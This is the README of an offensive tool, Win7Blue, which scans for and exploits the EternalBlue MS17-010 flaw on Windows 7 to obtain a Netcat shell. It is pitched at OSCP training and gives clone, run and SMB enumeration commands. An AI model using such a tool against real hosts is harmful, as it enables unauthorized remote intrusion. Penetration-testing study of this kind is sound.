Win7Blue is a tool created to scan/exploit the EternalBlue MS17-010 vulnerability on x86/x64 architectures. It gives you a regular shell through Netcat/Ncat (it doesn't use Metasploit) so it can be used in OSCP certification.
- Scan
- Exploit
- Use
root@kali:~# cd ~
root@kali:~# git clone https://github.com/d4t4s3c/Win7Blue.git
root@kali:~# cd Win7Blue
root@kali:~# chmod +x Win7Blue.sh
root@kali:~# ./Win7BLue.sh
- Enum arch (x86 / x64)
root@kali:~# crackmapexec smb <target>
SMB 192.168.1.XXX 445 TESTING [*] Windows 7 Professional 7600 x64 (name:TESTING) (domain:TESTING) (signing:False) (SMBv1:True)
-
Tested On:
- Kali
- Parrot
-
Requirements:
- Python
- Python3
- Msfvenom
- Impacket
- Netcat/Ncat